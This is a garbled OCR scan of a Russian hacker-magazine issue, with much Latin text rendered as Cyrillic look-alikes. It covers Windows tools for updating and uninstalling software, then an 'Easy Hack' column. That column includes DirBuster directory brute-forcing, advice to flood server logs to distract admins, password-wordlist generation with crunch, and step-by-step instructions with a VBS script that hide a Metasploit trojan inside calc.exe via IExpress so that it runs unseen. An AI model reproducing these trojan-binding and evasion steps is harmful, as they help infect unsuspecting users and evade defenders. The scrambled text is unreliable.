рамм, которые можно быстро установить в 



Устанавливаем и обновляем драйвера 



Пожалуй, самое ненавистное дело после переустановки системы — это даже не 
инсталляция всех программ. Нет! Есть монстр куда хуже — драйвера. Когда я впервые 
увидел ѴѴіпсІоѵѵз 7, хотелось закричать: «Свершилось!». Да, система через ѴѴіпсІоѵѵз 
ІЭрбаІе потягивает практически все необходимые дрова, и в этом я уже не раз убеж- 
дался. В результате уже не приходится ломать голову, какие неизвестные девайсы 
прописались в менеджере устройств — все устанавливается автоматом. Но как быть 
с ранними версиями винды и как в принципе обновить драйвера? Наш ответ — 
ОгіѵегМах ( ). Эта небольшая утилита позволит быстро 

стянуть из инета последнюю версию дров для самых разных устройств. Забудь про 
мучительные поиски редкого драйвера или давно пропавшего диска из «коробочки» 

— просто создай бесплатный аккаунт на сервисе и скачай все, что нужно. Впрочем, 
программа будет полезна даже в том случае, если ты такому подходу не доверяешь и 
предпочитаешь скачивать системное ПО с официальных сайтов. Бгіѵегтах имеет еще 
одну важную функцию — бэкап всех драйверов в системе. Поэтому после переустанов- 
ки системы инсталляция всех драйверов займет всего пару минут и потребует мини- 
мум усилий. Хочется признаться, что пару раз драйвера с помощью БгіѵегМах я все- 
таки не находил, но быстро исправлял ситуацию с помощью другой утилиты — Оеѵісе 
Оосіог ( ,]. 
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Авто-апдейт от Ооодіе 



Если ты когда-нибудь скачивал Ооодіе СЬготе, то знаешь: вместо 
оффлайн-дистрибутива браузера ты сливаешь лишь оболочку-инсталлятор, 
который уже, в свою очередь, в зависимости от ОС и прочих параметров, 
докачивает все необходимое. А если заходил когда-нибудь на страницу 
, то, наверное, обязательно обращал внимание на прог- 
рамму, которая разом устанавливает или обновляет в системе продукты от 
Ооодіе. Такая система интеллектуальной установки и автоапдейта назы- 
вается Ооодіе Юрсіаіе или отаба. Этот проект развивается под открытой 
лицензией и всегда доступен с . Важно, что это 

не просто программа, а продуманная в архитектурном плане система, 
позволяющая легко устанавливать и обновлять различные приложения 
— то, чего не хватает в современной винде, чтобы сделать репозиторий с 
софтом и менеджер пакетов а-ля Ыпих. 




> СІѴСІ 

На нашем дискеты 
найдешь нетолько 
свежие версии про- 
грамм из джентль- 
менского набора (это 
наш раздел ОаіІзоЛ], 
но и все утилиты, 
представленные 
в этой статье. 



системе. Выбираем нужную, кликаем «Ооѵѵпіоасі» — и 
программа сама, скачав дистрибутив, начинает процедуру 
установки. Увы, процедура инсталляции не прозрачна и не 
автоматизирована: пользователю даже приходится вруч- 
ную выбирать папку для закачки дистрибутива. Но и это 
не все. Если онлайн-сервисам еще можно было простить 
отсутствие проверки версий в системе и возможность 
обновления софта, то в десктопном ЕеиАРР такую возмож- 
ность вполне можно было реализовать. Так что придется 
искать решение для поддержки актуальности версий 
дополнительно. 

ОБНОВЛЕНИЕ 

УСТАНОВЛЕННЫХ ПРОГРАММ 

В случае с виндовыми приложениями, когда чуть не каж- 
дую неделю появляются новые публичные сплойты для 
разных браузеров, АбоЬе Реасіег'а и прочих клиентских 
приложений, вопрос обновления особенно актуален. 
Полностью автоматической системы, которая отслежи- 
вала бы появление новых версий и сама осуществляла 
апдейт, я не нашел. Но это, наверное, даже к лучшему, ибо 
от подобной автоматики в условиях ѴѴіпсІоѵѵз-окружения 
ждать можно было бы чего угодно. Совсем другое дело 
— полуавтоматический инструмент, который бы кро- 
потливо отслеживал наличие обновлений и предлагал 
установить их вручную с помощью штатных инсталлято- 
ров. Разработкой подобных инструментов и занимается 
западная зесигііу-компания Эесипіа. Мы не будем брать 
серьезные корпоративные решения, нацеленные на цен- 
трализованное обновление в сети, а возьмем бесплат- 



ную утилиту для персонального использования — Эесипіа 
Регзопаі ЭоЛѵѵаге Іпзресіог. 

Легковесная утилита быстро и со знанием дела сканирует 
всю систему и выдает подробный отчет, какие из программ 
нуждаются в обновлении. Для каждой устаревшей проги 
выдается рейтинг угрозы (в соответствии с обширной 
базой Эесипіа описаний уязвимостей] и, что самое удобное, 
прямая ссылка на загрузку самой последней версии дис- 
трибутива. Один клик — и уже можно приступать к обнов- 
лению. Помимо этого проверяется наличие апдейтов для 
самой винды, а всякий раз, когда ты по ошибке установишь 
не самую последнюю версию какой-нибудь софтины, в 
трее будет появляться соответствующее предупрежде- 
ние. Особое внимание уделяется безопасности браузеров 
и прилинкованных к ним плагинам (АбоЬе ЕІазЬ Ріауег, 
ОиіскТіте, 5ип ^ѵа и т.д.], а также клиентским программ 
для сетевых сервисов (например, Зкуре]. Подробный отчет, 
скажем, по АсІіѵеХ-компонентам становится доступен, если 
перевести Эесипіа Р5І в расширенный режим интерфейса. 



о. 

► 

.у $аѵе Сиггепі 5у5іет Соггіідигаііоп 
Сотраге/Сгеаіб І.од 
121 Мадісаі УпІпйаІІ Рге^егепсе* 



^ Неір 

^ ѴѴНаІ І5 Мадісаі ІІпІпйаІІ? 
.</ Іпіегпеі 




ІП5ІЗІІ ап Арріісайоп 



ІІпіпйаІІ ап Арріісаііоп 



КбіпБіаІІ а гетоѵесі Арріісаііоп 




Мадісаі ііпіпбЫІ Асііѵе 
Ехіі ргодгат 



Первое, что делает Мадіс Ііпіпзіаіі — сле- 
пок реестра и файловой системы 



► 038 
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Перед началом сканирования утилит скачиваем по безо- 
пасному НТТРЗ-проколу набор правил, в которых обозна- 
чено, каким образом проверять актуальность приложения. 
Тут стоит сказать, что на моей машине установлено просто 
огромное количество софта, от которого я не успеваю 
избавляться. При этом Зесипіа умеет находить обновлен- 
ные версии для многих из них. Увидев в своей РЗЗ-ленте 
информацию об обновленной версии баѵа, эксперимента 
ради я запустил Р5І — информация о необходимости 
обновления тотчас появилась на экране. Вот здесь-то и 
начинаешь ощущать, что поддержкой продукта занимает- 
ся не парочка энтузиастов, а целая команда зесигііу- 
специалистов. Кстати говоря, в любой момент времени 
Р5І выдает рейтинг обновленной системы Зесипіа Зузіет 
Зсоге. У меня это значение после долгого отсутствия 
апдейтов составляло 86%. А у тебя? 

КАК БЫТЬ С БЕТА-ВЕРСИЯМИ? 

Несмотря на наличие устаревших программ, в системе 
уживается еще и огромное количество бета-версий софта, 
которому до релиза еще далеко. Вообще приятно полу- 
чить приятные бонусы намного раньше других, а помочь 
разработчикам в поиске нескольких багов — не такая уж 
большая плата за такую возможность. Увы, Зесипіа Р5І 
никакие бетки не признает — оно и понятно, если уж 
в релизах полно багов, то чего ждать от бета или даже 
альфа-версий? Как же быть? Отслеживать выход свежих 
программ мне помогают ресурсы ІіІеІогит.ЬеІапеѵѵз.сот 
и ѵѵѵѵѵѵ.ІіІеЫрро.сот . Если в первом просто публикуют- 
ся новости о недавно вышедших версиях программ, то 
РіІеНірро представляет собой огромнейший каталог софта, 
который скрупулезно обновляется, как только выходит 
новая версия программы — вероятно, это делается авто- 
матически. Больше того, всем желающим предлагается 
скачать РіІеНірро. сот Брсіаіе СЬескег, который также, 
каки прога от Зесипіа, проверяет установленные в систе- 
ме программы на наличие обновлений. Но при этом... в 
отдельном списке предлагает установить еще и доступные 
бета-версии программ, указывая прямые линки на загруз- 
ку дистрибутивов. Забавно, что после установки только что 
скачанной РіІеНірро. сот Іірсіаіе СЬескег Р5І тут же отпи- 
сался, что для этой программы есть версия новее. Ведь 
явно врет, обижается что ли? :] 

ПРАВИЛЬНОЕ УДАЛЕНИЕ ПРОГРАММ 

Когда меню «Пуск» разрастается до нереальных размеров, 
начинаешь задумываться: «Пожалуй, здесь много лишне- 
го». Мое правило примерно таково — всякий раз, запуская 
штатный виндовый менеджер для установки и удаления 
программ, можно избавиться как минимум от пяти ненуж- 
ных утилит :). Вот, казалось бы, единственная функция 
пакетного менеджера, которая удаляет программы, и 
которую МісгозоІІ вроде как реализовал, есть. Пользуйся 
— не хочу. Но нет! Программу, конечно, она с грехом попо- 
лам удаляет, но если сделать снимок реестра и файловой 
системы до установки и после удаления, то обнаружива- 
ются интересные факты. Лишние ключи реестра, какие-то 
временные файлы... Почему они остались — непонятно. 
Есть много утилит, которые магическим образом обещают 
правильно удалять программы из системы, используют 
интеллектуальные алгоритмы для поиска левых ключей 
в реестре и т.д. На деле большинство из них — полная 
туфта, но не Азбатроо Мадісаі Ііпіпзіаіі [ ѵѵѵѵѵѵ.азЬатроо. 
сот ). Чем же он отличается от всех остальных? Принципом 
действия. Идея в том, что программа все время работает 
фоном и как только обнаруживает запуск зеіир.ехе, іпзіаіі. 



ехе и прочих инсталляционных бинарников, начинает 
тщательно следить за их действиями и изменениями в 
системе. По ходу дела составляется база данных, в кото- 
рой записаны все действия установщика: какие ключи в 
реестре прописал, какие файлы и где разместил — все 
четко по факту. Захотел удалить программу? Азбатроо 
Мадісаі Ип Іпгііаіі пробивает ее по базе и откатывает назад 
все изменения. Подход работает безотказно. Мало того, 
если ты по ошибке удалил не ту программу или банально 
передумал, то любую операцию деинсталляции можно в 
течение некоторого времени отменить, воспользовавшись 
встроенной утилитой Пеіпзіаііег. Мадісаі Бпіпзіаіі пока еще 
распространяется бесплатно, но лицензионный ключ при- 
дется запросить на сайте разработчиков. 

УВЫ И АХ! 

Менеджер пакетов как в Біпих? Увы, пока ничего не 
выйдет. До тех пор, пока нет стандартизированного меха- 
низма для установки, обновления и удаления приложе- 
ния, репозитория для хранения программ, о каком-либо 
аналоге арі-деі из никсов можно даже не говорить. Косяк 
МісгозоІІ? Безусловно. Но ведь и разработчики открытого 
софта не сильно чешутся на этот счет. Повально размещая 
свои проекты на Ооодіе Собе, ЗоигсеРогде и других ресур- 
сах, давно можно было сообразить и что-нибудь подобное. 
Только подумай: удобный менеджер приложений, в кото- 
ром будет только открытый софт — каков бонус для всего 
опенсорса, а? Пока же придется довольствоваться раз- 
розненными утилитами, которые даже в тандеме подчас 
не делают всего того, на что способны менеджеры пакетов 
в Біпих. ~?г 



Для каждой проги предлагает- 
ся прямой линк на дистрибутив 
новой версии 




> іпіо 



• Можно взять на 
заметку другие не- 
плохие программы 
для поиска апдейтов 



для установленного 
на компьютере соф- 
та. Это ЗБМо (ѵѵѵѵѵѵ. 




и Аррирбаіегі ѵѵѵѵѵѵ. 
паЬЬег.огд/рго]есІз/ 
аррирбаіег ]. 



• Несколько лет назад 
энтузиасты пытались 
создать портлинук- 
сового арі-деі — так 
на свет появился 
ѵѵіп-деі [ ѵѵіпбоѵѵз-деі. 
зоигсеіогде.пеі і. На- 
писанная на Разсаі'е 
система позволяла 
через консольустано- 
вить некоторые утили- 
ты, но, ксожалению, 
разработка быстро 
заглохла. Та же судьба 
постигла и другие 
начинания: Аррзпар, 
Аррирбаіег и даже 
пытавшийся объеди- 
нить все имеющиеся 
решения беШ I ѵѵѵѵѵѵ- 
рисЫзоІІ.сот/беІІЦ . 




ноте » Іірсіаіе СНескег Кезиіи 



13 ІІргіаіез йеіесіесі 




М} АІсоЬоІ 120% 2.0.0.1331 

т ш Іпаіаіаб Ѵагеіоп: 1.9.8.7530 


9.60ІЛѲ Л 


Еѵетоіе 3.5.3.1964 

Н»іаі«4 Ѵегаіоп: 3.1.0.1228 


39 75І.Ш Л 


П РооЬаг2000 1.0.2.1 

тяаіеО Ѵегаюп: РосЬаг2000 0.9.6.9 


2 991.1В Л, 


ф НііаскТМз 2.0.4 

Іп»іаІе4 Ѵегаюп: 2.0.0.3 


1 341.1В 


Ау баѵа Випііте Епѵігоптепі 1.6.0.20 (32>Ьіі) 

* * ілаіаіеа ѵегсюп 16.0.17 


15 761.1В 


Мо1ера<1++ 5.6.8 

іпсіаіео Ѵег&юп 5.6.3 0 


3.181.1В 


Й Рісаза 3.6 ВиіІс1 105.61 

ШаіаіеО Ѵагаіол 3 6108 41 


1 1 811.1В 


ЗіІѵеПідМ 4.0.50401 

Іл»іаіе4 Ѵегзеп 3 0 50106 0 


5 971.1В 


Зку ре 4.2.0.158 

іпаіаіеб Ѵегеіѳл: 4.1.0.179 


21 871.1В 


ІІШоскег 1.8.9 

^ Іпаіаіеб Ѵегзіоп 188 0 


216КВ Л 
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взлом 



■ ■ Тюрин «ѲгеепОод» Алексей адгггсіодгадтаіі.сот 




Еагц 

Нэск 



Е-Э2Ц 

Н-эск 



Еагц 

Наск 



Базу 



Наск 



ХАКЕРСКИЕ 

СЕКРЕТЫ 

ПРОСТЫХ 

ВЕЩЕЙ 



ЗАДАЧА: НАЙТИ СКРЫТЫЕ ДИРЕКТО- 
РИИ И ФАЙЛЫ НА ВЕБ-СЕРВЕРЕ 

РЕШЕНИЕ: 

Очень часто при взломе необходимо обнаружить скрытые файлы и директории на 
сервере. Например, спрятанную СМ5-админку, файлики с конфигами или какой-то 
другой критической информацией, которые не были должным образом спрятаны 
или удалены. Для начала, конечно же, стоит воспользоваться всевидящим Гуглом 
(или аналогичным поисковиком] с его операторами зііе, іпигі, йіеіуре ит.д., надеясь 
нато, что админ забыл ограничить его. Но есть и более злые методы. Представляю 
тебе многопоточный ІіРБ-брутфорсер йігВизІег, являющийся частью 0ѴѴА5Р. 

отазр . огд/іпсіех . рЬр/СаСедогу : 0МА8Р_БігВизЪег_Рго] есЦ 

Это Заѵа-приложение отличается достаточно широкими возможностями и отличной 
производительностью (обещают до 6000 запросов)! У меня вышло в среднем 300 
запросов в секунду при стандартных настройках производительности. 

Перечислю основные фичи: 

1 . Рекурсивный поиск директорий и файлов , начиная с любой ди- 
ректории; 

2 . Поддержка прокси; 

3. Поддержка НТТР-аутентификации; 

4 . Подделка НТТР-заголовков; 

5 . ШЬ биггіпд; 

6 . Перебор вариантов как по словарям, так и по символам. 

Программа проста в использовании, пояснютолько одну опцию. Сейчас для 
навигации очень часто используются всевозможные скрипты, поэтому прямые пути 
кфайлам недоступны. Тут нам и поможет ІІРЫи 22 Іпд. Все.чтоотнастребуется — это 
указать, какую часть 11Р1_следуетперебирать, используя пометку {сііг}. 

Например: 

/ 8ІЮѴТ . рЬр?р = { біг } .Пбші 








За пару минут логи арасЬ обросли мусором на 20 мегабайт 



П 

В 

:ѵи?и 




Брутфорсим скрытые директории и файлы. 



И программа вместо {біг} будет подставлять значения из своей базы. 

Признаюсь, что при всей своей крутости программа сыровата. 

В последней версии (1 .Огсі ) — злой глюк в рекурсии, поэтому иногда можно использо- 
вать предыдущую версию (0.1 2). Стандартные базы слов содержаточень много мусора. 
И, что хуже всего, хоть программа и имеет возможность работы без 6111 через консоль, 
но ее возможности в этом случае очень ограничены. Атак— цены бы ей не было. 

И еще, в связи с производительностью и объемом запросов (см. рисунок], которые 
ОігВизІеготправляетпри сканировании, можно использовать его для засорения 
логов, таким образом отвлекая админов отреального вектора атаки. 



ЗАДАЧА: ПОДКЛЮЧИТЬ ВНЕШНЮЮ АН- 
ТЕННУ К КОМПЬЮТЕРУ ИЛ И НОУТБУКУ 

РЕШЕНИЕ: 

Тема вардрайвинга нынче модна, и интерес к ней очень велик. Мануалы 
сведены «до кликов», попробовать себя хочет каждый. Но стандартных 
встроенных антенн в ноутбуках не хватает, особенно если хочется для начала 
попрактиковаться, и чтобы со всеми удобствами — из дома, а лишние денеж- 
ные затраты хочется свести к минимуму. Сделать свою собственную антенну 
нетрудно — в Сети полно мануалов, и ты можешь найти подходящую и по силе 
приема, и по своим навыкам, и по размерам загогулину. Другое дело — присо- 
единить ее к самому ноутбуку. Вообще, в ноутбуке на ѴѴІРі-карте обычно есть 
«выход» на внешнюю антенну, помеченный как«аих». И все, что нам требуется 
— припаять к нему коаксиальный провод, а другой его конец — к разъему для 

► 040 




антенны. Сам разъем закрепляется на корпусе ноутбука. 

Более подробное описание с картинками есть тут: 

йаЬгаІіаЬг . ги/Ыодз /тосМіпд/ 4 6483/ 

Если у тебя нет «сгоревшего сі-ііпк’а», как описано в статье, то все необходимое 
можешь найти в магазинетипа «Мегачип» или «Чип и Дип».Тамже могутподска- 
зать, что тебе конкретно необходимо. 

Но лично я паяльниктолько на картинках видел. А в ѴѴіРі, как известно, сверхвы- 
сокие частоты, потому неумеючи можно либо спаять с гигантскими потерями в 
силе сигнала, либо вообще испортить карточку. 

Ноестьдругой экономный вариант — использовать мини ІІЭВѴѴіРі-адаптер (в 
простонародье — «свисток»). Размером он с флешку, стоит от 500 руб. 

Отличный вариант, особенно с учетом того, что его можно повестить на ІІЭВ-удли- 
нитель, не боясь потери силы сигнала. А стандарт СІ5В поддерживает провода до 
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5 метров, что позволяет дотянуть«свисток», например, до окна. Есть «свистки» с 
выходами на внешнююантенну. Носамоезабавное — возможность совмещения 
баночной антенны и ѴѴіРІ-«свистка», что дает +5 6 Ві. Просто, доступно и практич- 
но для дома. Инструкция с картинками: 

когоІзЬор .пагосі. ги/МРі/ш-Ті .ЬСш 
При выборе «свистка» загляни на форум античата. Там есть список ѴѴіРі-адапет- 



ров и «свистков», которые лучше всего подходят для вардрайвинга. 

Тогшп. апШскак . ги/зЪо^ЪгеасПрЩр? 0=572 49 

Дополнительный бонус: если ты извращаешься и запускаешь ВаскТгаск на 
виртуалке отѴМѵѵаге.тосо встроенными ѴѴіРі-картами утебя ничего не получится, 
ибо ВаскТгаск их не увидит (проблемы с эмуляцией ѴѴіРі]. А вот «свисток» на чип- 
сете Н2570 или г173 и обнаруживается, и поддерживает необходимые функции. 




ЗАДАЧА: СОЗДАТЬ СВОЙ СЛОВАРЬ 
ДЛЯ БРУТФОРСЕРА 



РЕШЕНИЕ: 

Сейчас существует множество всевозможных брутфорсеров. Некоторые из них 
поддерживают посимвольный и словарный перебор, использование регулярных 
выражений, но не все. А что, если наделить брутфорсер такими возможностями? 
А иногда бывает необходимо создать специфический словарь, если известны 
какие-то символы пароля или, например, привычки человека. 

Как вариант, можно заюзать такую тулзу каксгипсЫ Что приятно — она входит 
в ВаскТгаск и довольно динамично развивается. Последняя версия на момент 
подготовки материала рубрики — 2.4 — есть на диске. 

А скачать ее можно тут: 



зошгсеТогде .пеД/ргсф ескз/сгипск-тоэгсііізі:/ 



еИОЕЬ-еІШ&к .іхі КООЕг-КБОЕА.Іхі гВОСи-гООЕЗ Лхі ХС 0 Е 2 -ѴС 0 БІ . іхі 
еооеб-есоеп.іхі квосі-кіШбС.ікі коасп-вваси .іхі ХБОЕг-гвоби.іхі 
сООеГ-еШБО . іхі КВОСи-ЕВОЕс .іхі гВОЕр-гВОбу . ІХІ уВОЕЬ-уВОБк . іхі 
ЕОПЕ^-Евасн.іхі кВОЕХ-ПШЕд.іхі гВОЕр-іВСЕк іхі КООЕБ-ѴСОБП.іхі 

сооеі -своей. іхі івоев-івоек.іхі квоей-звое* .іхі увоег-упосш іхі 

ЕВаЕИ-ЕШЕи.Іхі ІООЕВ-пВОСы.ІкІ гВПСТ-зВОЕс.іхі ѵрабі-ѵвоевлхі 

Евоем-евоеі.іхі евоег-ьвоеол*! ввоек-йвоес іхі увосі-умби Лхі 
еБОБР-еМЕ? Лхі ИШбЬ-ІВОЕд Лхі гВОЕк-гРОЕІ Лхі ѴВОБН-ѴІШеи Лхі 
ЕВОЕі-ЕМСС Лхі иООСЛ-ІВОСЗ.іхі ЗВОЕЪ-ЗВОЕк іхі уВОЕР-уВОЕ* Лхі 
еВОЕѵ-еВОБЕ іхі I ВОСЛ- ІВОСЮ Лхі зВСЕгІ-зВОБіч іхі ѴВОЕІ-ѴВОБС Лхі 
ЕВОЕХ-ГІШЕу Лхі ЕВОЕр-ЕВОСу .іхі ЗВ 0 СГ-ЗВ 0 Е 0 Лхі уВОЕи-уВОЕЕ Лхі 
своег-гвоеі лхі івоег-івоеа л*і звоен-хвоеа іхі /воех-гшсд Лхі 

ГВОЕБ-ЕВОЕК Лхі ЕВОЕТ-ПВОЕе.Іхі 5В0Е I -ЗВОЕи Лхі уВЕЕЕ-АВОЕи Лхі 
ГВОЕВ-ГВОЕП Лхі I ВОЕО-ілВОЕе Лхі ЗВОЕ I -ОВОЕд Лхі уВ0Е2-гВ0Е і Лхі 
ГВОеіі-ЕВОбд.іхі ЕВОСг-ЬВОЕ 3 Лхі зВОЕп-нВОЕы Лхі 2В0ЕВ-2В0еК Лхі 
ГВ0Е,]-ГВ0Е5 Лхі Пакете ЗВОБР-ЗВОЕѴ Лхі ^ВОЕВ-гВОЕП Лхі 

ЕВОЕЕ-ГВОСи.іхі МВОЕгі-ГІВаЕп.ікі зВОЕПЛВОЕа іхі 2В0ЕІі-2В0Сд Лхі 
ГВОЕМ-ГВПеи Лхі тВОБГ-^ВВЕо іхі ЗВОЕч-ЗВОБЕ Лхі гВОБ і-гМібз Лхі 
ГВОЕН-ЫШЕІ . іхі ИВОСН-ПВОЕ^ Лхі зВОЕх-еВОЕС . іхі 2В0ЕЕ-2В0Еи Лхі 
ГВОБг-ЕРОЕА Лхі *»0Б .І-тВОСЗ Лхі ЗВ0Е2-ТВ0Б і Лхі гВОБН-гПОеи Лхі 
ГВОЕі-ГЮОЕС Лхі ПВОЕп-МВОЕы Лхі іВОСЪ-іВОЕк Лхі 2В0Ег-2В0ЕА Лхі 
ЕВОБЕ-БВОЕс , Іхі пВОЕр-пВОЕу Лхі ТВОЕВ-ТВОБМ Лхі гВОБІ-ьВОБС Лхі 
ТВОЕХ-дВОЕд . іхі ПВОЕВ-МВОЕа . іхі ІВОЕГ-ІВОЕО Лхі 2В0БІ)-2В0К2 . іхі 
дВОБВ-дВОБК Лхі нВОЕТ-тіВОБсЛхі ТВОЕд-ТВОЕз Іхі гВОБХ-АВОБд Лхі 
гоаівЪі :/репіеЁІ^раЕкиогЛЕ.'Сгиііс}і![ _ 



Итог работы сгипсЫа. упс... 



На входезадаешь необходимую спецификацию, в итоге получаешьсловарь(фай- 
лом или через зісіоіЛ], который можнозапихнутьвлюбой брутфорсер, например, 
в вышеописанный ОігВизіег. Возможности широки, поэтому приведутолько пару 
примеров, чтобыты проникся этойтулзой и вспомнил о ней, когда возникнет 
необходимость. 

. /сгипсЬ. 4 6 -і сЬагзек . ІзС шіхаірііа-зрасе -о 8ТАКТ -с 100000 

где 4 и 6 — минимальная и максимальная длина слова в словаре, 
сНагзеТІБі тіхаірба-зрасе — набор символов из сЬагзеТІзТ который нужно 
использовать, в данном случае — алфавит в обоих регистрах и пробел. 

-оВТАРТ -с 500000 создаст несколько файлов, разбивая твой словарь по 100000 
записей в каждом. 

Если словарь создается очень дол го, тоты можешь остановить, а потом возобно- 
вить процесс, используя предыдущую команду с аргументов -г. 

Кстати, сНагвеЕШ можно поменять и настроить под себя, введя, к примеру, под- 
держку русского языка. В этом файле наборы символов перечисляются в квадрат- 
ных скобках и нарекаются именем, чтобы к ним можно было потом обратиться из 
сгипсЫа. Таким образом, добавив в этот файл строку следующего вида: 

гиа1рЬа= [абвгдеежзийклмнопрстуфхшщьъэюя] 



Итог примера: 

сБОСс19% 

сБОСс19 А 

сШОСА1@ 

сШОСАІ# 

Данной командой ты создашь словарь из семи символьных слов по заданному 
шаблону!-!], где 0 заменяется алфавитным символом, % — цифрой, л — спецсим- 
волом изуказанных наборов символов. Итогзапишется вѵѵогбІізШТ 
Следующая команда создаст словарь из всевозможных комбинаций слов 
после аргумента -т. Указывать дли ну слова надо обязательно, хотя она и не 
учитывается: 

. /сгшісЬ. 1 1 -ш Нарру ВігДМау МазЬа 

Итогпримера: 



мы добавим возможность создавать чисто русские словари, указывая гиаірба в МазЪаВігЕМауНарру 

качестве аргумента к сгипсЫу. МазЬаНарруВТгЕЬйау 

ВігкМауМазЬаНарру 

./сгшісЬ 7 7-1 @БОС@% А АВСБаЬссі 1369 @#$% А -о тлгогсііізЕ . ЕхЕ 




ЗАДАЧА: СОЗДАТЬ РОРТАВІ.Е-ВЕРСИЮ 
ЛЮБИМОЙ ПРОГРАММЫ. 



РЕШЕНИЕ: 

Очень часто появляется необходимость иметь любимое ПО под 
рукой, например, на флешке, чтобы установленный софт не оставил 
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после себя следов. Но настоящие рогІаЫе-версии ПО производи- 
тели редко создают. Можно самому «собрать» программу после ее 
установки, но искать все ее части, разбросанные по системе, перена- 
страивать — дело неблагодарное. В этом деле нам поможет ТЫ пАрр 
(раньше называлась ТЬіпзІаІІ) отѴМѴѴаге. С официального сайта 
можно скачать три ал -версию, но если тОебе не требуется что-то 
исключительное, например, поддержка ѴѴі п 7 или 64-битных систем, 

► 041 







ш 






Еагу 


Еагу 


Евзу 


Наск 


Наск 


Наск 



то можешь нарыть версию 3.x, которая удовлетворит большинство 
пожеланий. 

Идея такова : ТЫпАрр сканирует реестр и файловую системутвоей ОС до 
установки необходимой тебе программы и после, прослеживает изме- 
нения, внесенные ею, и создает контейнер — портативную виртуальную 
ОС вместе со всеми частями твоей программы, реестром. То есть, после 
запуска получившегося ехе’шника откроется твоя программа в виртуаль- 
ной среде окружения. 

Для примера я создал и запустил 7, 8 версии ІЕ вХРсо стандартной ІЕ6 
(см. рисунок]. 

От слов — к делу. Одно замечание: желательно все это проводить на чис- 
той системе, то есть без лишнего ПО и со стандартным реестром. Поэтому 
используют виртуальную ОС. 

1. Качаем и устанавливаем ТМпАрр; 

2 . Запускаем ТМпАрр ЗеСир СарГшге и выполняем предварительное 
сканирование; 

3 . Устанавливаем нужное ПО, если необходимо — перезагружаем комп; 

4 . Настраиваем наше ПО; 

5 . Удаляем лишние и временные файлы; 

6. Запускаем пост -сканирование в ТМпАрр; 



7 . Устанавливаем точки входа в ПО, то есть основные ехе-файлы 
программы; 

8 . Определяем метод изоляции ПО; 

9 . Указываем, где физически хранить файлы получившейся «песоч- 
ницы» ; 

10 . Вводим название проекта и другие настройки; 

11 . Получаем ехе-контейнер нашего ПО; 

12 . Радуемся! 

Вообще, возможностей уТЫпАрр много. Болеетонкая настройка каждого 
проекта осуществляется посредством файла Раскаде.іпі и ##АіІгіЬиІез.іпі 
в папках и перестройкой ЬиіІб.ЬаІ 
К примеру, в Раскаде.іпі можно задать следующее: 

[ІзоІаГіоп] 

ВігесПогуІзо1а1:іопМосІе=Ри11 

Получившийся контейнер не будет и меть доступа кфайловой системе 
реальной ОС. 

Из минусов стоит отметить снижение производительности и небольшие 
ограничения ПО, которое можно виртуализировать. 



№5 



ЗАДАЧА: СПРЯТАТЫРОЯН В ЛЮБОМ 
ЕХЕ-ФАЙЛЕ 



РЕШЕНИЕ: 

В прошлом номере я рассказывал о способе создания трояна с использова- 
ниемтолько тзірауіоаб, и отом, какего спрятать с помощью тзіепсобе (части 
Меіазріоіі], объединив с каким-либо ехе-файлом. У это го метода объединения 
файла есть одна проблема: получившийся ехе-файл запускает не программу, 
с которой был объединен троян, а только его самого, так как происходит изме- 
нениеточки входа в программу, да и вообще :)... 

Есть один старый и легальный метод для объединения файлов. И, что приятно, 
встроенный в винду. Потомуты можешь использовать его и на благое дело. 
Имя программы, которой мы воспользуемся — ІЕхргезз. Для примера я объ- 
единил троян, созданный в прошлом номере, и стандартный калькулятор. 

Но начну по порядку: 

1. Копируем троян (геѵегзе . ехе) и калькулятор на рабочий стол; 

2 . Создаем файл зЬб.ѵЪз и пишем в него: 

ЗеТ ѵлзЬзЬеІІ = Ѵ/ЗсгірЬ . СгеаСеОІДесІ: («ѴЛЗсгірР . 8М11») 
мзЬзЕеН . гші «саіс . ехе» , 1 , Раізе 
тлзМІіеІІ . гші «геѵегзе . ехе», 0 , Раізе 

Итак, мы создали скрипт на Ѵізиаі Вазіс, который по очереди запускаетоба 
нашихехе-файла. Параметры, переда ваемыеѵѵзбзЬеІІ.гип: 

1. Имя файла для запуска; 

2 . Отображать ли окно программы при запуске , где 0 — нет , 1 — да 
(есть и другие варианты) ; 

3 . Ждать ли закрытия программы перед выполнением следующего 
оператора . 

После этого мы запускаем іехргезз (Пуск Выполнить-^ іехргезз] и следуем 
указаниям мастера: 

1. Далее - Далее; 

2 . Любое название; 

3 . Далее - Далее ; 

4 . Добавляем файлы, которые хотим объединить в пакет (зЬб.ѵЬз, 
геѵегзе. ехе, саіс. ехе); 



5 . Выбираем программу для запуска при старте (пока что любую из 
них) ; 

6 . Далее - Далее ; 

7 . Вводим путь для сохранения пакета и ставим обе галки (ЕЕ1. 
ехе) ; 

8 . Галку на ГІоКезСагС; 

9 . Далее - Далее . 




5е* 

ч^панеТІ . гдл "саіе.еке" Д. 
ѵУзИз^еП.гил "геѵег5е.еке .О.РіТке 



Мшащая 



инение пос 



:редством ІЕхргезз 



В результате на рабочем столе должны появиться два файла: настройки ІИ . 
зеб и ІИ. ехе. 

Лезем вІИ .зеб и меняем там значение АррИаипсбеб на следующее, которое 
запустит наш ѵЬ-скрипт: 

АррВаипсЪ.еб=сзсгір1: зЬЛ.ѵЬз 

Запускаем іехргезз и пересоздаем пакет на основе нового 5ЕИ (выбирается 



► 042 
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сразу при запуске іехргезз]. Ярлыкдля полученного файла можно поменять На детектируемостьантивирусами запаковка почти не влияет, что логично, 

с помощью редактора ресурсов. На диске есть зесі -фай л, та к что можешь такчто 18 вместо 21 из 41. 

поменять пути внутри на необходимые. 



ЗАДАЧА: ВЫНУТЬФАЙЛЫ ИЗРСАР- 
ДАМПАТРАФИКА 



РЕШЕНИЕ: 

Программ, которые позволяютвыцепить конкретные файлы из рсар-файлов 
(стандартный формат дампа сетевого трафика], достаточно много. Воттолько 
большинство из них и работают не очень хорошо, и давно не поддерживаются, а 
выцепляюттолько картинки да ЫтГки. Не считая всяких платных продуктов, где 
все работает«на ура», есть пара достойных и при этом доступных про г. 

Какни странно, под ѴѴіп с этой задачей отлично справился ИеІѵѵогкМіпег. 

Все, что нужно сделать — открыть в нем требуемый рсар-файл и наслаждаться 
результатом, раскиданным по разным вкладкам. Он и анализируетбыстро, и 
сортирует все хорошо, и итоги «рабочие». 

Из того, что входит в комплект Васк Тгаск 4, могу посоветовать разве что 
Ьгетозіда ісрхігасі Но последний надо устанавливать из репозитория, и не 
обновляется он уже давно. 

Пример: 



ІогетозЦ -і бшпр.рсар 

Где -і битр.рсар — путь до рсар-файла с дампом трафика. Глобальные настройки производятся с помощью файла /еІсЛогетозСсопГ 




